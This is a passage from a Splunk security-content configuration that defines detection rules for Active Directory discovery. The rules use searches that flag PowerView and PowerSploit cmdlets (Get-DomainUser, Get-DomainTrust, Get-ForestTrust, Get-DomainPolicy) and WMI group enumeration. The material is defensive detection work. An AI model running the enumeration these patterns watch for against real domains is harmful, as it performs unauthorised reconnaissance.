Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-08-26 action.escu.modification_date = 2021-08-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Get DomainPolicy with Powershell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = an instance of process $process_name$ with commandline $process$ in $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 30}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get DomainPolicy with Powershell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 60, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` executing the `Get-DomainPolicy` commandlet used to obtain the password policy in a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery. action.notable.param.rule_title = Get DomainPolicy with Powershell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe" OR Processes.process_name="powershell*") AND Processes.process = "*Get-DomainPolicy*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_domainpolicy_with_powershell_filter` [ESCU - Get DomainPolicy with Powershell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get DomainPolicy` commandlet used to obtain the password policy in a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get DomainPolicy` commandlet used to obtain the password policy in a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The following Hunting analytic requires PowerShell operational logs to be imported. Modify the powershell macro as needed to match the sourcetype or add index. This analytic is specific to 4104, or PowerShell Script Block Logging. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2022-05-02 action.escu.modification_date = 2022-05-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Get DomainPolicy with Powershell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = powershell process having commandline $ScriptBlockText$ to query domain policy. action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "UserID", "risk_object_type": "user", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get DomainPolicy with Powershell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 60, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get DomainPolicy` commandlet used to obtain the password policy in a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery. action.notable.param.rule_title = Get DomainPolicy with Powershell Script Block action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText ="*Get-DomainPolicy*" | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_domainpolicy_with_powershell_script_block_filter` [ESCU - Get-DomainTrust with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies Get-DomainTrust from PowerView in order to gather domain trust information. Typically, this is utilized within a script being executed and used to enumerate the domain trust information. This grants the adversary an understanding of how large or small the domain is. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1482"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies Get-DomainTrust from PowerView in order to gather domain trust information. Typically, this is utilized within a script being executed and used to enumerate the domain trust information. This grants the adversary an understanding of how large or small the domain is. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives as this requires an active Administrator or adversary to bring in, import, and execute. action.escu.creation_date = 2021-08-24 action.escu.modification_date = 2021-08-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Get-DomainTrust with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Suspicious PowerShell Get-DomainTrust was identified on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 12}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 12}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get-DomainTrust with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 40, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1482"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies Get-DomainTrust from PowerView in order to gather domain trust information. Typically, this is utilized within a script being executed and used to enumerate the domain trust information. This grants the adversary an understanding of how large or small the domain is. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. action.notable.param.rule_title = Get-DomainTrust with PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process=*get-domaintrust* by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_domaintrust_with_powershell_filter` [ESCU - Get-DomainTrust with PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies Get-DomainTrust from PowerView in order to gather domain trust information. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1482"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies Get-DomainTrust from PowerView in order to gather domain trust information. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = It is possible certain system management frameworks utilize this command to gather trust information. action.escu.creation_date = 2022-05-02 action.escu.modification_date = 2022-05-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Get-DomainTrust with PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Suspicious PowerShell Get-DomainTrust was identified on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 12}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 12}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get-DomainTrust with PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 40, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1482"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies Get-DomainTrust from PowerView in order to gather domain trust information. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.notable.param.rule_title = Get-DomainTrust with PowerShell Script Block action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*get-domaintrust*" | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_domaintrust_with_powershell_script_block_filter` [ESCU - Get DomainUser with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to enumerate domain users. `Get-DomainUser` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to enumerate domain users. `Get-DomainUser` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Get DomainUser with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery", "CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = an instance of process $process_name$ with commandline $process$ in $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get DomainUser with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to enumerate domain users. `Get-DomainUser` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain users for situational awareness and Active Directory Discovery. action.notable.param.rule_title = Get DomainUser with PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe" OR Processes.process_name="powershell*") AND Processes.process = "*Get-DomainUser*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_domainuser_with_powershell_filter` [ESCU - Get DomainUser with PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainUser` commandlet. `GetDomainUser` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may use PowerView to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainUser` commandlet. `GetDomainUser` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may use PowerView to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The following Hunting analytic requires PowerShell operational logs to be imported. Modify the powershell macro as needed to match the sourcetype or add index. This analytic is specific to 4104, or PowerShell Script Block Logging. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Get DomainUser with PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery", "CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = Powershell process having commandline "*Get-DomainUser*" for user enumeration on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get DomainUser with PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainUser` commandlet. `GetDomainUser` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may use PowerView to enumerate domain users for situational awareness and Active Directory Discovery. action.notable.param.rule_title = Get DomainUser with PowerShell Script Block action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*Get-DomainUser*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest, UserID as user| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_domainuser_with_powershell_script_block_filter` [ESCU - Get-ForestTrust with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies Get-ForestTrust from PowerSploit in order to gather domain trust information. Typically, this is utilized within a script being executed and used to enumerate the domain trust information. This grants the adversary an understanding of how large or small the domain is. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1482"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies Get-ForestTrust from PowerSploit in order to gather domain trust information. Typically, this is utilized within a script being executed and used to enumerate the domain trust information. This grants the adversary an understanding of how large or small the domain is. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives as this requires an active Administrator or adversary to bring in, import, and execute. action.escu.creation_date = 2021-09-02 action.escu.modification_date = 2021-09-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Get-ForestTrust with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Suspicious PowerShell Get-ForestTrust was identified on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 12}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 12}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get-ForestTrust with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 40, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1482"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies Get-ForestTrust from PowerSploit in order to gather domain trust information. Typically, this is utilized within a script being executed and used to enumerate the domain trust information. This grants the adversary an understanding of how large or small the domain is. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. action.notable.param.rule_title = Get-ForestTrust with PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=powershell.exe OR Processes.process_name=cmd.exe Processes.process=*get-foresttrust* by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_foresttrust_with_powershell_filter` [ESCU - Get-ForestTrust with PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies Get-ForestTrust from PowerSploit in order to gather domain trust information. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1482", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies Get-ForestTrust from PowerSploit in order to gather domain trust information. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = False positives may be present. Tune as needed. action.escu.creation_date = 2022-02-24 action.escu.modification_date = 2022-02-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Get-ForestTrust with PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Suspicious PowerShell Get-ForestTrust was identified on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 12}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 12}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get-ForestTrust with PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 40, "impact": 30, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1482", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies Get-ForestTrust from PowerSploit in order to gather domain trust information. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.notable.param.rule_title = Get-ForestTrust with PowerShell Script Block action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*get-foresttrust*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_foresttrust_with_powershell_script_block_filter` [ESCU - Get WMIObject Group Discovery - Rule] action.escu = 0 action.escu.enabled = 1 description = The following hunting analytic identifies the use of `Get-WMIObject Win32_Group` being used with PowerShell to identify local groups on the endpoint. \ Typically, by itself, is not malicious but may raise suspicion based on time of day, endpoint and username. \ During triage, review parallel processes and identify any further suspicious behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following hunting analytic identifies the use of `Get-WMIObject Win32_Group` being used with PowerShell to identify local groups on the endpoint. \ Typically, by itself, is not malicious but may raise suspicion based on time of day, endpoint and username. \ During triage, review parallel processes and identify any further suspicious behavior. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present. Tune as needed. action.escu.creation_date = 2021-09-14 action.escu.modification_date = 2021-09-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Get WMIObject Group Discovery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get WMIObject Group Discovery - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=powershell.exe OR processes.process_name=cmd.exe) (Processes.process="*Get-WMIObject*" AND Processes.process="*Win32_Group*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `get_wmiobject_group_discovery_filter` [ESCU - Get WMIObject Group Discovery with Script Block Logging - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies the usage of `Get-WMIObject Win32_Group`, which is typically used as a way to identify groups on the endpoint. Typically, by itself, is not malicious but may raise suspicion based on time of day, endpoint and username. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.001"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The 